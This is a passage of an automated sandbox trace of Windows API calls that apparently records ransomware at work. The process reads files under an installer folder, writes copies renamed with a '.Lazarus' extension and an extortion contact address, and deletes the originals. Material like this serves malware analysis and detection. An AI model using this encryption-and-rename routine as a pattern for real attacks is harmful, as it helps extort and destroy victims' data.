lpNumberOfBytesRead=0x327f0c4*=0xe4a, lpOverlapped=0x0) returned 1 [0070.618] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.618] GetLastError () returned 0x0 [0070.618] SetLastError (dwErrCode=0x0) [0070.618] GetLastError () returned 0x0 [0070.618] SetLastError (dwErrCode=0x0) [0070.618] GetLastError () returned 0x0 [0070.619] SetLastError (dwErrCode=0x0) [0070.619] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.619] GetLastError () returned 0x0 [0070.619] SetLastError (dwErrCode=0x0) [0070.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d618 [0070.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0070.619] GetLastError () returned 0x0 [0070.619] SetLastError (dwErrCode=0x0) [0070.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0070.619] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327ef70*=0xe50, lpOverlapped=0x0) returned 1 [0070.619] GetLastError () returned 0x0 [0070.619] SetLastError (dwErrCode=0x0) [0070.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0070.619] GetLastError () returned 0x0 [0070.619] SetLastError (dwErrCode=0x0) [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0070.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.620] CloseHandle (hObject=0x428) returned 1 [0070.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.623] CloseHandle (hObject=0x418) returned 1 [0070.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.623] AreFileApisANSI () returned 1 [0070.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0070.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0070.624] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.625] GetFileType (hFile=0x418) returned 0x1 [0070.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0070.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.626] GetLastError () returned 0xb7 [0070.626] SetLastError (dwErrCode=0xb7) [0070.626] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0070.627] CloseHandle (hObject=0x418) returned 1 [0070.627] AreFileApisANSI () returned 1 [0070.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0070.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0070.627] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.628] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0070.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0070.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0070.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.629] AreFileApisANSI () returned 1 [0070.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0070.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0070.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0070.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.630] AreFileApisANSI () returned 1 [0070.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0070.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.630] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.630] GetFileType (hFile=0x418) returned 0x1 [0070.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0070.630] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.630] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.631] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.631] CloseHandle (hObject=0x418) returned 1 [0070.631] AreFileApisANSI () returned 1 [0070.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0070.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.631] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.631] GetFileType (hFile=0x418) returned 0x1 [0070.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.631] CloseHandle (hObject=0x418) returned 1 [0070.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0070.632] AreFileApisANSI () returned 1 [0070.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0070.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.632] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0070.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0070.632] AreFileApisANSI () returned 1 [0070.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.633] GetLastError () returned 0x0 [0070.633] SetLastError (dwErrCode=0x0) [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1f0 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0070.633] GetLastError () returned 0x0 [0070.633] SetLastError (dwErrCode=0x0) [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0070.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.633] AreFileApisANSI () returned 1 [0070.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0070.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0070.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0070.634] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.634] GetFileType (hFile=0x418) returned 0x1 [0070.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.634] AreFileApisANSI () returned 1 [0070.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0070.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0070.634] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.635] GetFileType (hFile=0x428) returned 0x1 [0070.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.635] GetLastError () returned 0x0 [0070.635] SetLastError (dwErrCode=0x0) [0070.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.635] GetLastError () returned 0x0 [0070.635] SetLastError (dwErrCode=0x0) [0070.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.635] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0070.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0070.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0070.739] GetLastError () returned 0x0 [0070.739] SetLastError (dwErrCode=0x0) [0070.739] GetLastError () returned 0x0 [0070.739] SetLastError (dwErrCode=0x0) [0070.747] GetLastError () returned 0x0 [0070.747] SetLastError (dwErrCode=0x0) [0070.747] GetLastError () returned 0x0 [0070.747] SetLastError (dwErrCode=0x0) [0070.747] ReadFile (in: 